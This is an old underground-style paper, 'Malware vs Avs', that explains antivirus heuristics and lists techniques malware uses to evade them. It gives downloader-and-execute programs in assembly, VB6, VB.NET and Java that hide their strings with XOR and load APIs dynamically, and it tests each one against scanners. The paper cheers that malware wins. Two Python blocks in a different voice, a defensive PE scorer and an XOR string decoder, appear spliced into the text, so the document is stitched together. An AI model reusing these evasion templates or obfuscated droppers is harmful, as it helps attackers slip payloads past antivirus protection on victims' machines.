
File: /home/juza/Desktop/Malware vs Avs v1 Page 1 of 13

___
/\\,/\\, ,, - -_,
/| || || _ ||; _ ; ( ~/|| ;
|| || || < \,||\\/\/\ < \,,._-__-_ \\/\ _-_,( / || \\/\ _-_,
||=|= || /-|||||| | | /-|| || || \\|| |||_. \/==|| || |||_.
~|| || ||(( |||||| | |(( || || ||/ || | ~ || /_ _|| || | ~ ||
|, \\,\\,\/\\\\\\/\\/ \/\\ \\,\\,/ \\/ , -_- ( - \\,\\/ , -_-
_-

------------------------][Malware vs Avs][---------------------

0x00 - Index
0x10 - Intro
0x20 - Avs
0x30 - Malware
0x40 - Avs Techniques
0x50 - Malware Techniques
0x60 - Examples
0x70 - Conclusion
0x80 - Credits/References

+ ------[ Shell ] -------------------- +


| Juza:/ > ./MalwareVSAvs --Index 0x10 |
| Juza:/ > Redirected to the Intro ... |
+ ------------------------------------ +

In this paper I will explain what antivirus software is and what malware is =), and
show you the techniques that antivirus software uses to find malware and, of course,
the techniques that malware uses to avoid AV detection.

At the end, I will show you some practical examples of basic malware applications,
written in the main programming languages available today (ASM, C/C++, Visual Basic
6/.NET, Java), and see why an antivirus detects our app, or doesn't detect it =).

Note: Sorry for the bad English.

+ ------[ Shell ] -------------------- +


| Juza:/ > ./MalwareVSAvs --Index 0x20 |
| Juza:/ > Redirected to Avs ... |
+ ------------------------------------ +

Antivirus, by definition: "Antivirus software are computer programs that attempt to
identify, neutralize or eliminate malicious software." But nowadays it does a lot more
than just "neutralize" and "eliminate" "malicious software": an antivirus is designed
to eliminate all kinds of threats, all kinds of malware.
Antivirus software uses sophisticated techniques to identify known malware and, of
course, unknown malware. For this, it looks for suspicious behaviour in any computer
program, and the best weapon of antivirus nowadays is heuristic analysis, or just
heuristics.
These techniques will be analysed further on in the article.

+ ------[ Shell ] -------------------- +


| Juza:/ > ./MalwareVSAvs --Index 0x30 |
| Juza:/ > Redirected to Malware ... |
+ ------------------------------------ +

Malware, by definition: "Malware is all applications that attempt to compromise the
security of a computer system." So malware can be viruses, trojan horses, rootkits,
worms, spyware, backdoors, etc.
Like antivirus, malware uses sophisticated techniques to avoid antivirus detection:
encryption, packing, entrypoint obscuring, anti-emulation, polymorphic techniques,
hooks, injections, and more.
These techniques will be analysed further on in the article.

+ ------[ Shell ] -------------------- +


| Juza:/ > ./MalwareVSAvs --Index 0x40 |
| Juza:/ > Redirected to Avs Techniques|
+ ------------------------------------ +

There are two main methods to detect malware, generic and specific.

Specific: the antivirus must have some information about the target malware.
Generic: the antivirus detects malware based on malware characteristics.

This generic method is also called heuristics; heuristics is the technique that
antivirus software uses to detect malware. Heuristics is a technology that lets an
antivirus detect malware by signatures, characteristics and emulation; this can be
done by an advanced artificial intelligence.

Heuristics was created because of the increasing number of malware creations:
according to F-Secure, in 2007 the malware creations exceeded all malware creations
of the previous 20 years put together. In 1995, malware was taking control over
antivirus software. Antivirus companies reacted with heuristic technology.

The most advanced heuristic engines use:

- variable/memory emulator;
- parser;
- flow analyzer;
- code analyzer;
- disassembler/emulator;
- weight-based system and/or rule based system.

There are two types of scanning, signature scanning and heuristic scanning.

Signature scanning: this type of scanning searches for certain sequences of bytes
that exist in common malware, like "*.exe", Windows APIs, and others.

Heuristic scanning: this type of scanning is a lot more advanced than the last one;
heuristic scanning searches for instructions or commands within a program that are not
found in typical applications.

There are some characteristics that can get malware detected by antivirus,
and these characteristics are:

[Characteristics]

- Executable
    - Incorrect timestamp;

- Entrypoint
    - Entrypoint location, if the entrypoint isn't in the first section;

- Size of the executable
    - Executable is less than 2 KB;

- PE HEADER data
    - PE header location;
    - Incorrect SizeOfImage;
    - Incorrect SizeOfCode;
    - PE header incorrect parameters;

- Section characteristics
    - If the last section is executable;
    - If the first section is writable;

- Number of sections
    - Executable has only one section;

- Section names
    - Unknown section name;
    - Empty section name;

- Code
    - Different from the standards of the language;
    - Code redirections;
    - Long loops/jumps;
    - Usage of the PEB to obtain the image base of system DLLs;

- Suspicious strings
    - "*.exe";
    - "CreateRemoteThread";
    - etc;

- etc...

[Emulation]

- Suspicious file access;
- Relocator;
- Suspicious Memory Allocation;
- Contains a routine to search for executable (.COM or .EXE) files;
- Found an instruction decryption routine;
- Flexible Entry-point;
- The program traps the loading of software;
- Disk write access;
- Access/Creation of files in critical folders;
- Memory resident code;
- Invalid opcode (non-8088 instructions) or out-of-range branch;
- Suspicious jump construct;
- Inconsistent exe-header;
- Garbage instructions;
- Undocumented interrupt/DOS call;
- EXE/COM determination;
- Overwrite/move a program in memory;
- Re-start the application after modifications;
- Unusual stack;
- Incorrect executable tree;
- etc...

Each one of these characteristics has a determined weight; the sum of all the weights
indicates whether it is malware or not.

In short, heuristics is a very powerful technology, but it has some imperfections:
heuristics can produce false positives. For example, a program designed to format hard
disks, defragment disks, etc.: some antivirus will say that this program is malware, or
that it's infected.

To prevent this from happening, antivirus can recognise legitimate applications.
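The weighted scoring described above, as an added example (my own code, not from the paper or from any AV product): a small Python scorer that reads the PE32 header fields the characteristics list refers to, applies the checks that can be decided from the header alone, and sums their weights. The weights, the threshold, the known-section-name list and the two header fixtures built by `build_pe32` are assumptions made for the illustration.

```python
import struct
# Weights for the header characteristics listed above (values are this example's own choice).
WEIGHTS = {"file_smaller_than_2kb": 1, "timestamp_zero": 1, "single_section": 2,
           "entrypoint_not_in_first_section": 3, "first_section_writable": 2, "last_section_executable": 2,
           "sizeofimage_mismatch": 3, "empty_section_name": 2, "unknown_section_name": 1}
KNOWN_SECTIONS = {".text", ".data", ".rdata", ".idata", ".rsrc", ".reloc", ".bss", "CODE", "DATA"}
IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE = 0x20000000, 0x80000000

def parse_pe32(data):
    """Return (timestamp, entry RVA, SizeOfImage, SectionAlignment, sections) from a PE32 header."""
    pe = struct.unpack_from("<I", data, 0x3C)[0]                # e_lfanew
    assert data[:2] == b"MZ" and data[pe:pe + 4] == b"PE\0\0", "not a PE file"
    # NumberOfSections, TimeDateStamp, (symbol table fields), SizeOfOptionalHeader
    nsec, timestamp, _, _, opt_size = struct.unpack_from("<HIIIH", data, pe + 6)
    opt = pe + 24                                                # start of the optional header
    entry, align, size_of_image = (struct.unpack_from("<I", data, opt + o)[0] for o in (16, 32, 56))
    sections = []
    for off in range(opt + opt_size, opt + opt_size + 40 * nsec, 40):
        name, vsize, vaddr, *_, chars = struct.unpack_from("<8sIIIIIIHHI", data, off)
        sections.append((name.rstrip(b"\0").decode("latin-1"), vaddr, vsize, chars))
    return timestamp, entry, size_of_image, align, sections

def score_pe32(data, threshold=6):
    """Run the weighted checks; returns (score, triggered check names, flagged?)."""
    timestamp, entry, size_of_image, align, sections = parse_pe32(data)
    hits = []
    if len(data) < 2048: hits.append("file_smaller_than_2kb")
    if timestamp == 0: hits.append("timestamp_zero")
    if len(sections) == 1: hits.append("single_section")
    if sections:
        _, f_addr, f_size, f_chars = sections[0]
        _, l_addr, l_size, l_chars = sections[-1]
        if not f_addr <= entry < f_addr + f_size: hits.append("entrypoint_not_in_first_section")
        if f_chars & IMAGE_SCN_MEM_WRITE: hits.append("first_section_writable")
        if l_chars & IMAGE_SCN_MEM_EXECUTE: hits.append("last_section_executable")
        # a consistent SizeOfImage is the end of the last section rounded up to SectionAlignment
        if size_of_image != -(-(l_addr + l_size) // align) * align: hits.append("sizeofimage_mismatch")
    for name, *_ in sections:
        if not name: hits.append("empty_section_name")
        elif name not in KNOWN_SECTIONS: hits.append("unknown_section_name")
    score = sum(WEIGHTS[h] for h in hits)
    return score, hits, score >= threshold

def build_pe32(sections, entry, size_of_image, timestamp=0x4879E4A0, file_size=4096):
    """Constructed fixture: a bare PE32 header with the given section table (not a loadable program)."""
    hdr = bytearray(b"MZ" + bytes(58) + struct.pack("<I", 0x40))           # e_lfanew = 0x40
    hdr += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), timestamp, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                                  # PE32 magic
    # AddressOfEntryPoint, BaseOfCode, BaseOfData, ImageBase, SectionAlignment, FileAlignment
    struct.pack_into("<IIIIII", opt, 16, entry, 0x1000, 0x2000, 0x400000, 0x1000, 0x200)
    struct.pack_into("<I", opt, 56, size_of_image)
    hdr += opt
    for name, vaddr, vsize, chars in sections:                             # 40-byte section headers
        hdr += struct.pack("<8sIIIIIIHHI", name.encode(), vsize, vaddr, vsize, 0x400, 0, 0, 0, 0, chars)
    return bytes(hdr) + bytes(max(0, file_size - len(hdr)))

# Constructed samples: a conventional two-section layout, and one with several of the listed anomalies
NORMAL_PE = build_pe32([(".text", 0x1000, 0x800, 0x60000020), (".data", 0x2000, 0x200, 0xC0000040)], 0x1000, 0x3000)
ODD_PE = build_pe32([(".text", 0x1000, 0x1000, 0x60000020), ("xyz", 0x2000, 0x1000, 0xE0000020)],
                    0x2000, 0x5000, timestamp=0, file_size=1024)
```

Each hit on its own is weak evidence (a legitimate packer trips several of them), which is exactly why the sum is compared against a threshold rather than any single check deciding.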

+ ------[ Shell ] -------------------- +


| Juza:/ > ./MalwareVSAvs --Index 0x50 |
| Juza:/ > Redirected to Malware Tech. |
+ ------------------------------------ +

Now, after all this, how can malware bypass this whole system called heuristics? Nowadays
malware also uses advanced techniques to avoid detection by antivirus, and these techniques are:

- Section characteristics not altered;
- Add known section names;
- Obfuscation;
- Entrypoint obscuring;
- Stack patches;
- Update checksums;
- Update timestamp;
- Correct PE HEADER;
- SEH;
- Use MMX, SSE technology;
- Anti-Sandbox;
- Anti-Debug;
- Anti-Virtualization;
- API redirect;
- API hook (Layer 0/3);
- Decrypt code with brute force;
- Use threads or double threads (Multi-Multi Thread Engine =));
- No strings;
- etc...
These are the main techniques to avoid heuristic emulation. Just remember: your application
must look like any other normal application.

+ ------[ Shell ] -------------------- +


| Juza:/ > ./MalwareVSAvs --Index 0x60 |
| Juza:/ > Redirected to Examples ... |
+ ------------------------------------ +

In this section we will build some basic programs, only to test the reactions of AVs.
First of all, we will create a simple program that shows a message box and exits, just to
see the reactions.

I will use VirusTotal to run the tests.

MASM.

.386
.model flat, stdcall
option casemap:none

include user32.inc
include kernel32.inc
includelib user32.lib
includelib kernel32.lib

.data
_szMessage db "Juza", 0h
_szText    db "The Puppet Master", 0h

.code
start:
    ; MessageBoxA(hWnd, lpText, lpCaption, uType), arguments pushed right to left
    push 0                      ; uType = MB_OK
    push offset _szMessage      ; lpCaption
    push offset _szText         ; lpText
    push 0                      ; hWnd = NULL
    call MessageBoxA

    push 0                      ; exit code
    call ExitProcess
end start

Result : hxxp://www.virustotal.com/pt/analisis/1a00...31746fc0e0f1057

One AV, Prevx1, tells me that the code above is "Cloaked Malware", hmm, very interesting, lol.

Let's try now with FASM.

format PE GUI 4.0
entry start

include 'win32a.inc'

section '.data' data readable writeable

_caption db 'The Puppet Master',0
_message db 'Juza',0

section '.code' code readable executable

start:
    ; MessageBoxA(hWnd, lpText, lpCaption, uType), arguments pushed right to left
    push MB_OK
    push _caption
    push _message
    push NULL
    call [MessageBox]

    push 0
    call [ExitProcess]

section '.idata' import data readable writeable

library user, 'USER32.dll',\
        kernel, 'KERNEL32.DLL'

import user,\
       MessageBox, 'MessageBoxA'

import kernel,\
       ExitProcess, 'ExitProcess'

Result: hxxp://www.virustotal.com/pt/analisis/83b9...e57f99cdade57db

And now the most interesting thing: 5 AVs detect a potential virus, and just for
a simple message box.

Now let's test with C/C++.

#include <windows.h>

#ifndef null
#define null 0
#endif

int main(int argc, char **argv) {
    /* MessageBoxA(hWnd, lpText, lpCaption, uType) */
    MessageBox(null, "Juza", "Juza", null);
    return 0;
}

Result: hxxp://www.virustotal.com/pt/analisis/fbfd...c15fdeef60c2fd5

Hmm, nothing. That's good, after what we saw previously.

Now with Visual Basic 6.

Private Declare Function MessageBox _
    Lib "user32" Alias "MessageBoxA" _
    (ByVal hwnd As Long, ByVal lpText As String, _
     ByVal lpCaption As String, ByVal wType As Long) As Long

Private Sub Form_Load()
    MessageBox &H0, "Juza", "Juza The Puppet Master", &H0
    Unload Me
End Sub

Result: hxxp://www.virustotal.com/pt/analisis/0f76...40ab9d00c52d28c

Another surprising detection: Panda tells me that it is a "Suspicious file" =).

Now let's try VB.NET.

Public Class Form1

    Private Sub Form1_Load( _
        ByVal sender As System.Object, _
        ByVal e As System.EventArgs) _
        Handles MyBase.Load
        MessageBox.Show("Juza", "Juza", MessageBoxButtons.OK)
    End Sub
End Class

Result: hxxp://www.virustotal.com/pt/analisis/6c13...b75f1970099c5b5

Nothing.

Now for the final test, we will use Java.

import javax.swing.JApplet;
import javax.swing.JFrame;
import javax.swing.JOptionPane;

public class mg extends JApplet {

    static JFrame frame = new JFrame("My Window");

    public static void main(String[] args) {
        JOptionPane.showMessageDialog(frame, "Juza The Puppet Naster");
    }
}

Result: hxxp://www.virustotal.com/analisis/f418982...016d9f5f9d1b6df

As I thought, nothing.

From these results we can draw a simple conclusion: the majority of AVs find it easier to
detect something strange in native Win32 applications. The same AVs that detect something
strange in the ASM message box (MASM, FASM) detect nothing in the framework-based languages,
VB.NET and Java, so we can conclude for now that AVs have difficulty emulating Java and .NET
based applications.

Now I will finish the tests with something simple, but something that every malware coder
has programmed before: I will test the AVs with a simple downloader, just to see the reactions.

In the case of the non-framework based applications we will import just one API; the rest will
be loaded dynamically, with a simple encryption function on the strings to prevent signature
scanning.

The file we will download is PuTTY, located at:

hxxp://the.earth.li/~sgtatham/putty/latest/x86/putty.exe

MASM.

.386
.model flat, stdcall
option casemap:none

include kernel32.inc
include shell32.inc
includelib kernel32.lib
includelib shell32.lib

.data
; strings are stored XOR-encoded (key noted after each) and decoded in place at run time
; http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
_szDownload db ".226|ii2.#h#'42.h*/i85!2'2.'+i6322?i*'2#52i>~pi6322?h#>#", 0h  ; key 70
_szDll      db "Afxy{z:pxx", 0h                                                 ; key 20
_szFunc     db "}zdlG_FDGIL|GnADMi", 0h                                         ; key 40
_szSp       db "a8^rwvv{,gzg", 0h                                               ; key 2

_dwHDll  dd 0h      ; module handle returned by LoadLibrary
_dwHFunc dd 0h      ; address returned by GetProcAddress

.code

start:
    ; decode _szDll in place (XOR 20) up to the NUL terminator
    mov eax, offset _szDll
@@:
    cmp byte ptr [eax], 0h
    je @F
    xor byte ptr [eax], 20
    add eax, 1
    jmp @B
@@:
    push offset _szDll
    call LoadLibrary
    mov _dwHDll, eax

    ; decode _szFunc (XOR 40) and look it up in the loaded module
    mov eax, offset _szFunc
@@:
    cmp byte ptr [eax], 0h
    je @F
    xor byte ptr [eax], 40
    add eax, 1
    jmp @B
@@:
    push offset _szFunc
    push dword ptr [_dwHDll]
    call GetProcAddress
    mov _dwHFunc, eax

    ; decode the URL (XOR 70) and the local path (XOR 2)
    mov eax, offset _szDownload
@@:
    cmp byte ptr [eax], 0h
    je @F
    xor byte ptr [eax], 70
    add eax, 1
    jmp @B
@@:
    mov eax, offset _szSp
@@:
    cmp byte ptr [eax], 0h
    je @F
    xor byte ptr [eax], 2
    add eax, 1
    jmp @B
@@:
    ; call the resolved function: (pCaller, szURL, szFileName, dwReserved, lpfnCB)
    mov eax, dword ptr _dwHFunc
    push 0h
    push 0h
    push offset _szSp
    push offset _szDownload
    push 0h
    call eax

    ; ShellExecuteA(hwnd, lpOperation, lpFile, lpParameters, lpDirectory, nShowCmd)
    push 5                      ; SW_SHOW
    push 0
    push 0
    push offset _szSp
    push 0
    push 0
    call ShellExecute

    push 0
    call ExitProcess

end start

Result: hxxp://www.virustotal.com/pt/analisis/b1f2...a734d9f65375736

Hmm, this is a result I did not expect: just 4 AVs, and the best ones (Kaspersky, NOD32)
don't detect it.

Let's try with FASM.

format PE GUI 4.0
entry start

include 'win32a.inc'

section '.data' data readable writeable

; strings are stored XOR-encoded (key noted after each) and decoded in place at run time
_szDownload db ".226|ii2.#h#'42.h*/i85!2'2.'+i6322?i*'2#52i>~pi6322?h#>#", 0h  ; key 70
_szDll      db "Afxy{z:pxx", 0h                                                 ; key 20
_szFunc     db "}zdlG_FDGIL|GnADMi", 0h                                         ; key 40
_szSp       db "a8^rwvv{,gzg", 0h                                               ; key 2

_dwHDll  dd 0h      ; module handle returned by LoadLibrary
_dwHFunc dd 0h      ; address returned by GetProcAddress

section '.code' code readable executable

start:
    ; decode _szDll in place (XOR 20) up to the NUL terminator
    mov eax, _szDll
@@:
    cmp byte [eax], 0h
    je @F
    xor byte [eax], 20
    add eax, 1
    jmp @B
@@:
    push _szDll
    call [LoadLibrary]
    mov [_dwHDll], eax

    ; decode _szFunc (XOR 40) and look it up in the loaded module
    mov eax, _szFunc
@@:
    cmp byte [eax], 0h
    je @F
    xor byte [eax], 40
    add eax, 1
    jmp @B
@@:
    push _szFunc
    push [_dwHDll]
    call [GetProcAddress]
    mov [_dwHFunc], eax

    ; decode the URL (XOR 70) and the local path (XOR 2)
    mov eax, _szDownload
@@:
    cmp byte [eax], 0h
    je @F
    xor byte [eax], 70
    add eax, 1
    jmp @B
@@:
    mov eax, _szSp
@@:
    cmp byte [eax], 0h
    je @F
    xor byte [eax], 2
    add eax, 1
    jmp @B
@@:
    ; call the resolved function: (pCaller, szURL, szFileName, dwReserved, lpfnCB)
    mov eax, [_dwHFunc]
    push 0h
    push 0h
    push _szSp
    push _szDownload
    push 0h
    call eax

    ; ShellExecuteA(hwnd, lpOperation, lpFile, lpParameters, lpDirectory, nShowCmd)
    push 5                      ; SW_SHOW
    push 0
    push 0
    push _szSp
    push 0
    push 0
    call [ShellExecute]

    push 0
    call [ExitProcess]

section '.idata' import data readable writeable

library shell, 'SHELL32.DLL',\
        kernel, 'KERNEL32.DLL'

import kernel,\
       GetProcAddress, 'GetProcAddress',\
       LoadLibrary, 'LoadLibraryA',\
       ExitProcess, 'ExitProcess'

import shell,\
       ShellExecute, 'ShellExecuteA'

Result: hxxp://www.virustotal.com/pt/analisis/44d2...9f51e1b46fb916a

7 AVs detect it, not bad.

Now with Visual Basic 6.

Private Declare Function URLDownloadToFile Lib "urlmon.dll" _
    Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, _
    ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long _
    ) As Long

Private Sub Form_Load()
    ' the URL and local path are stored XOR-encoded (keys 70 and 2) and decoded at run time
    URLDownloadToFile &H0, decript(".226|ii2.#h#'42.h*/i85!2'2.'+i6322?i*'2#52i>~pi6322?h#>#", 70), _
        decript("a8^rwvv{,gzg", 2), &H0, &H0

    Shell decript("a8^rwvv{,gzg", 2)

    Unload Me
End Sub

' XOR each character of szStr with intVal and return the decoded string
Private Function decript(ByVal szStr As String, ByVal intVal As Integer) As String
    Dim i, a As Integer
    Dim szChar As String
    Dim szDump As String

    For i = 1 To Len(szStr)
        szChar = Mid(szStr, i, 1)
        a = intVal Xor Asc(szChar)
        szChar = Chr(a)
        szDump = szDump & szChar
    Next i

    decript = szDump
End Function

Result: hxxp://www.virustotal.com/pt/analisis/9f89a47f99d0e8c70320cd6335267d86

They detect this by the signature "URLDownloadToFileA".
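The native builds above hide the same API name and URL behind a one-byte XOR, which is why a plain string signature misses them there. The usual analyst counter, shown here as an added example (my own code, not the paper's), is to brute-force every single-byte key per NUL-terminated string and look for known names; the sample bytes are constructed from the encoded strings in the MASM/FASM data sections above, and the needle list is my assumption.

```python
# Constructed sample "data section": the four encoded strings from the downloader above,
# each still NUL-terminated (the decode loops stop at the NUL, so it is stored in clear).
SAMPLE = (b".226|ii2.#h#'42.h*/i85!2'2.'+i6322?i*'2#52i>~pi6322?h#>#\0"
          b"Afxy{z:pxx\0"
          b"}zdlG_FDGIL|GnADMi\0"
          b"a8^rwvv{,gzg\0")

# Names a plain signature scan would look for (my choice of list); a one-byte XOR hides them all.
KNOWN_NEEDLES = [b"URLDownloadToFileA", b"LoadLibraryA", b"GetProcAddress",
                 b"CreateRemoteThread", b"http://", b".exe", b".dll"]

def iter_c_strings(data, min_len=4):
    """Yield (offset, bytes) for every NUL-terminated run of at least min_len bytes."""
    off = 0
    for chunk in data.split(b"\0"):
        if len(chunk) >= min_len:
            yield off, chunk
        off += len(chunk) + 1

def find_xored_strings(data, needles=KNOWN_NEEDLES):
    """Try all 256 single-byte XOR keys on each string and report (offset, key, decoded)
    whenever the decoded string contains one of the needles (case-sensitive, since a
    key differing by 0x20 would otherwise also match a letters-only needle).
    Key 0 is tried too, so clear-text hits are reported alongside the encoded ones."""
    found = []
    for off, chunk in iter_c_strings(data):
        for key in range(256):
            dec = bytes(b ^ key for b in chunk)
            if any(n in dec for n in needles):
                found.append((off, key, dec.decode("latin-1")))
    return found

if __name__ == "__main__":
    for off, key, text in find_xored_strings(SAMPLE):
        print(f"offset {off:3d}  key {key:3d}  {text}")
```

The four strings come back with keys 70, 20, 40 and 2, the same keys the assembly loops above use, so the "no strings" evasion only defeats a scanner that never tries to decode.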

Visual Basic .NET

Imports System.IO
Imports System.Net
Imports System.Text

Public Class Form1

    Private Sub Form1_Load( _
        ByVal sender As System.Object, ByVal e As System.EventArgs) _
        Handles MyBase.Load

        ' the URL and local path are stored XOR-encoded (keys 70 and 2) and decoded at run time
        Dim wr As HttpWebRequest = CType(WebRequest.Create(decript(".226|ii2.#h#'42.h*/i85!2'2.'+i6322?i*'2#52i>~pi6322?h#>#", 70)), HttpWebRequest)
        Dim ws As HttpWebResponse = CType(wr.GetResponse(), HttpWebResponse)
        Dim str As Stream = ws.GetResponseStream()
        Dim inBuf(100000) As Byte
        Dim bytesToRead As Integer = CInt(inBuf.Length)
        Dim bytesRead As Integer = 0

        While bytesToRead > 0
            Dim n As Integer = str.Read(inBuf, bytesRead, bytesToRead)
            If n = 0 Then
                Exit While
            End If
            bytesRead += n
            bytesToRead -= n
        End While
        Dim fstr As New FileStream(decript("a8^rwvv{,gzg", 2), FileMode.OpenOrCreate, _
                                   FileAccess.Write)
        fstr.Write(inBuf, 0, bytesRead)
        str.Close()
        fstr.Close()

        Shell(decript("a8^rwvv{,gzg", 2))
        Me.Close()

    End Sub

    ' XOR each character of szStr with intVal and return the decoded string
    Private Function decript(ByVal szStr As String, ByVal intVal As Integer) As String
        Dim i, a As Integer
        Dim szChar As String
        Dim szDump As String = vbNullString

        For i = 1 To Len(szStr)
            szChar = Mid(szStr, i, 1)
            a = intVal Xor Asc(szChar)
            szChar = Chr(a)
            szDump = szDump & szChar
        Next i

        decript = szDump
    End Function

End Class

Result: hxxp://www.virustotal.com/pt/analisis/e5e3ab6de021d6d81570ce71f0539569

Haha, AVs don't like frameworks =).

Java

import java.io.*;
import java.net.*;

public class FileDownload {

    public static void download(String address, String localFileName) {
        OutputStream out = null;
        URLConnection conn = null;
        InputStream in = null;
        try {
            URL url = new URL(address);
            out = new BufferedOutputStream(new FileOutputStream(localFileName));
            conn = url.openConnection();
            in = conn.getInputStream();
            byte[] buffer = new byte[1024];
            int numRead;
            long numWritten = 0;
            while ((numRead = in.read(buffer)) != -1) {
                out.write(buffer, 0, numRead);
                numWritten += numRead;
            }
            System.out.println(localFileName + "\t" + numWritten);
        } catch (Exception exception) {
            exception.printStackTrace();
        } finally {
            try {
                if (in != null) {
                    in.close();
                }
                if (out != null) {
                    out.close();
                }
            } catch (IOException ioe) {
            }
        }
    }

    // derive the local file name from the last path component of the URL
    public static void download(String address) {
        int lastSlashIndex = address.lastIndexOf('/');
        if (lastSlashIndex >= 0 && lastSlashIndex < address.length() - 1) {
            download(address, address.substring(lastSlashIndex + 1));
        } else {
            System.err.println("Could not figure out local file name for " + address);
        }
    }

    public static void main(String[] args) throws IOException {
        String command = "wine putty.exe";
        download("http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe");
        Process child = Runtime.getRuntime().exec(command);
    }
}

Result: hxxp://www.virustotal.com/analisis/a7cb0fb...4d620aebd4e11bd

Nothing, as I expected.

+ ------[ Shell ] -------------------- +


| Juza:/ > ./MalwareVSAvs --Index 0x70 |
| Juza:/ > Redirected to Conclusion .. |
+ ------------------------------------ +

First of all, sorry that I didn't complete the code, but I have a lot of
work; if I win, I will finish it lol =), just kidding.

OK, conclusion. With this we can conclude that:

- The majority of AVs don't have such well-developed heuristics.
- We can easily bypass them.
- Applications that are based on frameworks aren't detected. =)

The more similarities your malware has to a normal application, the better its chances of
avoiding antivirus detection, by making AVs think it is a normal application.

Know your enemy, and you will always be victorious.

.. and the winner is, malware of course. =)

+ ------[ Shell ] -------------------- +


| Juza:/ > ./MalwareVSAvs --Index 0x80 |
| Juza:/ > Redirected to Cred/Ref ... |
+ ------------------------------------ +

[References]

[1] Peering Inside the PE: A Tour of the Win32 Portable Executable File Format
    - hxxp://msdn.microsoft.com/en-us/magazine/ms809762.aspx

[2] Heuristic Anti-Virus Technology by Frans Veldman
    - hxxp://mirror.sweon.net/madchat/vxdevl/vdat/epheurs1.htm

[3] Anti heuristic techniques
    - hxxp://vx.netlux.org/lib/vbj01.html

[4] A guide to Anti-Heuristics / Shmistics Technology
    - hxxp://vx.netlux.org/lib/vkh01.html

[5] .NET/MSIL Malicious Code and AV/Heuristic Engines
    - hxxp://www.securityfocus.com/infocus/1642

[6] Heuristic analysis
    - hxxp://en.wikipedia.org/wiki/Heuristic_analysis

[7] Heuristic Techniques in AV Solutions: An Overview
    - hxxp://www.securityfocus.com/infocus/1542

[8] Fighting EPO Viruses
    - hxxp://www.securityfocus.com/infocus/1841

[9] Juza
    - Brain

[Credits]

Frans Veldman, Markus Schmall, Marco Schmidt, ...

By Juza The Puppet Master,

Sun Jul 13 2008
